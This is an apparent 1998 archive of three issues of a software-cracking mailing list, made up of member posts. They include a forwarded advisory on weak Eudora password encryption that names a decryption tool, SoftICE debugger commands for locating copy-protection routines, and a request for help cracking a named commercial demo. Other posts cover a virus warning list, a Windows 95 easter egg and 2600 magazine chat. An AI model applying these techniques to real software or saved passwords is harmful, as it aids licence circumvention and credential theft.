ton of coding channel #cracking is a good one for the more technical minded who have been around a while - meaning that most of the crackers there are long in the cracking scene and tend to be slightly jaded from so many newer crackers and their many needs - which is the same reason i made my website in the first place, so i could help more people indirectly since direct is much too time consuming any other addresses of sites would be completely welcome additions to hcuml - and should be posted on occasion since the newer users of our mailing list cannot get the addresses out of the back issues which have been stripped of them (just not too often or it becomes spam ;) mexelite's page is focused on a newer user as well - i think it is mex98.home.ml.org - but this can be verified on channel #cracking4newbies since mexelite tends to hang around there for that matter, #revolt seems to be restructuring lately after a long break and many changes, so for any of you who are interested in checking them out and seeing if they are up to cracking or helping somehow, it cant hurt, though it may take a bit before things get really rolling for them again well, back to coding i go... i don't want to seem like i don't ever shut up ;) take care +gthorne -----#3------------------------------------------------- Subject: gthorne - re: grasping orc lessons Message Body = the message i just sent had the topic cut off, and was meant to respond to the letter on someone needing help grasping orc lessons +gthorne =====End of Issue 158=================================== ======================================================== +HCU Maillist Issue: 159 03/07/1998 -------------------------------------------------------- Send Articles To:......................... ************* Info, Help, Unsubscription, etc:....... **************** Web Repository.........................hcuml.home.ml.org ======================================================== CONTENTS: #1 Subject: Re: What every cracker should have #2 Subject: (Fwd) Eudora 4.0 password encryption flaw #3 Subject: Be encouraged and not discouraged by what you find. #4 Subject: gthorne - an interesting day ARTICLES: -----#1------------------------------------------------- Subject: Re: What every cracker should have Hi Wafna, do you tell me the rest of your tricks if i send you the full german version of Skat2010? :) Itīs a 487 kb self-extracting exe. NiKai 5777852 (ICQ) ______________________________________________________ Get Your Private, Free Email at ********************** -----#2------------------------------------------------- Subject: (Fwd) Eudora 4.0 password encryption flaw Somebody sent me, this, perhaps someone may be interested ------- Forwarded Message Follows ------- THE PROBLEM The mail program Eudora from Qualcomm Inc. has the ability to save the mail password in its INI file ('save password'. This password is encrypted in a not-too-strong way. HOW-TO There's a program called EUDPASS.COM on the Net that can easily decrypt this password. Although Qualcomm does know about this (I mentioned the problem several times, also prior to the release of Eudora 3), the problem still exists in current versions and has not been fixed. AFFECTED SOFTWARE ALL Eudora clients for Windows are vulnerable, Light and Pro, including the just-released version 4. As I don't have a Macintosh, I could not verify how Eudora stores its password on a Mac. WHAT TO DO Although they know the problem, no solution has been offered by Qualcomm. Until they change the encryption algorithm, the password can be easily decrypted by anyone with access to the INI file. Of course, having the INI file means someone can check your mail. But that 'someone' could not use the password to log in directly to the machine the mail is stored on. With this utility, the password itself can be obtained. Don't save your password, or make sure your INI file (better, the entire mail directory) can not be accessed by anyone. Hope Qualcomm will change the algorithm some day. -----#3------------------------------------------------- Subject: Be encouraged and not discouraged by what you find. Hail +All and +new: Briefly coming back from the dead zone of the working class for a break. To the new student(s) of cracking who posted on March 5, welcome to the dark woods. Yeah, having come this far, you only begin to realize how far you have to go. Go check out +gthorne's Orcpacks and fravia+ essays for stuff to work at on your own pace. More than enough there to keep one occupied with a cross section of research material for a long time. There's no real barrier to crack, just a lot of reading and getting your hands on the corresponding programs to practice on, in order to acquire and properly apply your knowledge and skill. I doubt that many of us are full time crackers, making a fortune selling cracks. I myself have found that by visiting fravia+ and reading this mailing list, I reinforce my problem solving and searching skills for the work place, where I earn my living. At this school of higher learning, there is no supervision. No one to tell what you to do and how to do it. You've got to be your own master and tell yourself when you are on the wrong track and get back on the right one. Easy to say, tough to do. < I guess what i really want to know is...will i miss something < important and ENLIGHTENING if i do not totally understand the < lessons? please let me know so that i can decided wether to < move on or to continue to wrestle with the lessons until i win < the prize. For the same reasons, why we are not all born on the same day and live the same lives, what do you think you are missing? You can spend your whole life searching and still not find it. If you do find it, can you take it to your grave with you? If you need a place to hang out, this is it, not because of the topic but because of the intellectual interaction and discussion among the members. Like lions, they will bring down the prey of some holy protection scheme and expose the inner workings and tender morsels for you to contemplate and digess. It is their precious gift to you, but you've got to be around to receive it. If you are like myself at this point in time, master in no area of expertise, just sit back and soak it in like a sponge. The generosity of the participants in sharing their knowledge is overwhelming and it's free. In time, you'll be amazed at what you have learnt. You do have time, don't you? wlc -----#4------------------------------------------------- Subject: gthorne - an interesting day Message Body = I just attended another of about five 2600 meetings I have ever been to and it started out kinda lame until the first person showed up late and started peeking through the o'reilly tcp/ip and unix manuals I had strewn about the table. He and I played 'spot the fed' for a while, though they seemed not to be around at this particular one - 'seemed' being the operative word. The (rather spastic fellow.. which is kind of like me on too much coffee as i have been all day..) handed me a copy of the newest 2600 magazine which does not hit the newsstand for 3 days (of which he had several copies...) At this point i was of course rather impressed, first at the interest with which he showed in deterring tcpip attacks (of which one of his servers seems to have problems with one in particular - and a problem with which i am not at all that useful in solving (yet) and then about the fact that he had these magazines in abundance which were not generally available. So I finally got around to asking who he was, and i recognize him from a few months ago as well.. with a friend of his (his friend states that cold fusion 4 and above has the innate ability to adjust remote webserver variables - of which i will have to see for myself!) It turns out that (for you fellows who have a copy of this interesting magazine and have actually looked at the front cover (and who are ready to shoot me by now for being so damned suspenseful... is none other than Ben the layout editor for 2600 magazine. Well dear readers, I am quite the decadent one and of course had him sign my new copy :) Of all the places in the world to be, it would seem he and i live in the same town This is actually the first meeting that I have been to that actually led anywhere, as we discussed what I (we in hcu) do - a little on how protocols worked... got a signed copy... etc... Anyway - I thought it was rather cool, noone else near me seems to be interested in codes and cracking, hacking and the like - as it has always been for me The sad part of course is that noone of that fine 'organization' seems to have any idea what we do, or that cracking.net ever even existed (not that i am surprised, but it is still disappointing nonetheless) Maybe with luck (and a little work on my part) the gap between hackers and crackers can be made a little less obvious Who knows. I think I am going to have another coffee. +gthorne =====End of Issue 159=================================== ======================================================== +HCU Maillist Issue: 160 03/09/1998 -------------------------------------------------------- Send Articles To:......................... ************* Info, Help, Unsubscription, etc:....... **************** Web Repository.........................hcuml.home.ml.org ======================================================== CONTENTS: #1 Subject: some things I have learnt (I know - woopie) #2 Subject: frustration with PCBDEMO #3 Subject: virii #4 Subject: Easter Egg in W95 #5 Subject: 2600 Magazine ARTICLES: -----#1------------------------------------------------- Subject: some things I have learnt (I know - woopie) Greetings ever1 ! I have a few things to vent today.... How lucky is +Gthorne to even BE at a 2600 meeting!!!??? If any1 has any info on getting 2600 mag in Australia please let me know, also I'd love to see anty Back issues. As the anon person who replied to the letter about the "barrier", +orc's lessons etc.. I believe that I have made a vast progress this week(being learming for approx 2 weeks) in a number of ways: 1. In #C4N some1 mentioned HWND - This was very enlightening! This shows what your program functions are 2. learning the search in SIce : s 0 l ffffff "strin_u_want" this searches for a string in memory: s - search 0 - starting bytes l - length "strin" - the text you wanna look for 3. BPR
R|W - is a breakpoint when a prog tries to read or write to specified mem address. ex : BPR 0013742bd 0013742bd RW 4. BPX hmemcpy - will break when a program copies to memory(I think!) 5. Once I have broken into the routine that I think is near the copy protection, I have been doing a "D ax" or "D 15c5" to find out what value is in the register or mem loc. Is this a good way to find things? I have allso stepped through the cod with F10 and did plenty of "d ". Am I wasting time? I am beginning to understand the ASM better from this anyway. I tend to look at anything that mucks with strings such as SI , DI, etc.. hope some of this helps some1... anything I am misguided in please let me know!! cheers, HaQue -----#2------------------------------------------------- Subject: frustration with PCBDEMO Hi again ppl!! I guess by now everyone in #c4n would be getting sick of me asking about ways to crack this program, But I cannot rest Till I have either cracked it else found out its not crackable. The program is PCBDEMO.ZIP (PCB Designer by Niche software) , available at ********************************* It is a printed circuit board program. They say that the only diff between the full ver and demo is that the demo will only print "sample.pcb" I have found that in the c:\windows\pcb.ini file there is a "user, serial, address" field. I tried bpint 21, but it doesnt seem to access the file for that info... I can't find any way to register the program either. I cannot seem to load the Exports from the .exe, or the .dll ?? Doing HWND in Sice finds stuff like "SLHMessageBar", "SLHTipWindow" etc.. but I cant set bpx's on them..(cant load the exports??) I have found string that says (Demo version) by itself which leads me to believe that the program puts that string in there while unregistered? I have tried entering in user="HaQue", serial="11111111" in the pcb.ini, but have never found reference in Sice to show that PCBDEMO is using that info... I have tried millions of things from my limited knowledge and It has come time to shout HELP!!!!! I don't neccessarily want any1 to write a crack, patch, tute etc - even a simple: "this program can be registerd, and cracked" or "This is a demo only you twit" would be fine! TIA Cheers HaQue -----#3------------------------------------------------- Subject: virii Hi again my third letter today! - important info that some of you might not be aware of. I recieved this in another mail and some of you may uses these files... Here is a list of other possible/probable infected files that were reported by a Russian virus scanner called DrWeb, and Norton Av and Integrity Checker virus scanner. Some of these infected cracks are on web sites and a few are on the cd with 6,000 cracks. A working of PC Cillin would be great to run over these new cracks too! COOLED_1.ZIP Bomb - Instantly Overwrites All Files on your computer C4A_H__1.ZIP Home Away 2.12 virus unknown DSI_AZP2.ZIP Advanced ZIP Password Recovery 0.90 Omnivirus DWCDWZ09.ZIP COM.BOOT.CRYPT.Virus DWTASKCK.ZIP COM.BOOT.CRYPT.Virus DW_TB98.ZIP COM.BOOT.Virus FR_CC305.ZIP Raid.5831 virus FR_EMN27.ZIP Raid.5831 virus FR_IN12.ZIP Raid.5831 virus FR_PWB98.ZIP Raid.5831 virus FR_SW305.ZIP Raid.5831 virus FR_TTT2D.ZIP Raid.5831 virus FZC104E.ZIP Omnivirus GR302CRK.ZIP Omnivirus IPHONE40.ZIP COM.BOOT.CRYPT.Virus PC_EZ20A.ZIP COM.BOOT.TSR.Virus PC_JFP30.ZIP COM.BOOT.TSR.Virus PC_KS112.ZIP COM.BOOT.TSR.Virus PC_MD260.ZIP COM.BOOT.TSR.Virus PC_MP170.ZIP COM.TSR.CRYPT.Virus UCFBW333.ZIP Blackwidow 3.33 virus unknown VDL_MF20.ZIP COM.TSR.CRYPT.Virus VDL_P3D1.ZIP COM.TSR.CRYPT.Virus cheers HaQue -----#4------------------------------------------------- Subject: Easter Egg in W95 Hi there! This is my first time writing to the list. I'd like to show you an EasterEgg planted inside Micro$oft Windows 95 that you might not know. If you donīt like things like this in the list, tell me! I won't do it again. 1st. You should create a new folder anywhere (i.e desktop) 2nd. Change the name of the folder to "New Folder" -without the quotes and taking notice about Caps-. 3rd. Change the name again to "and now, the moment you've all been waiting for" 4th. Change the name once again to "we proudly present for your viewing pleasure" 5th. Last change "The Microsoft Windows 95 Product Team!" 6th. Once done this last name change, switch your speakers on and open the folder. Amazing how this guys increase the length of the 'operating system' (sic) with this nonsenses.... BTW, why is it that HotMail URLs are not striped in the articles we receive? I don't think we should get their email acounts now that it belongs to MicroSoft, shouldn't we? Chers Mr.DoS -----#5------------------------------------------------- Subject: 2600 Magazine Hello Everyone Hello Gthorne >The (rather spastic fellow.. which is kind of like me on too much >coffee as i >have been all day..) handed me a copy of the newest 2600 >magazine which does not >hit the newsstand for 3 days (of which he had several copies...) Due to my indolence is 2600 a FREE magazine or in my dreams? :-)) Are there any FREE hacking magazines you would recommend? cheers Rundus ______________________________________________________ Get Your Private, Free Email at ********************** =====End of Issue 160===================================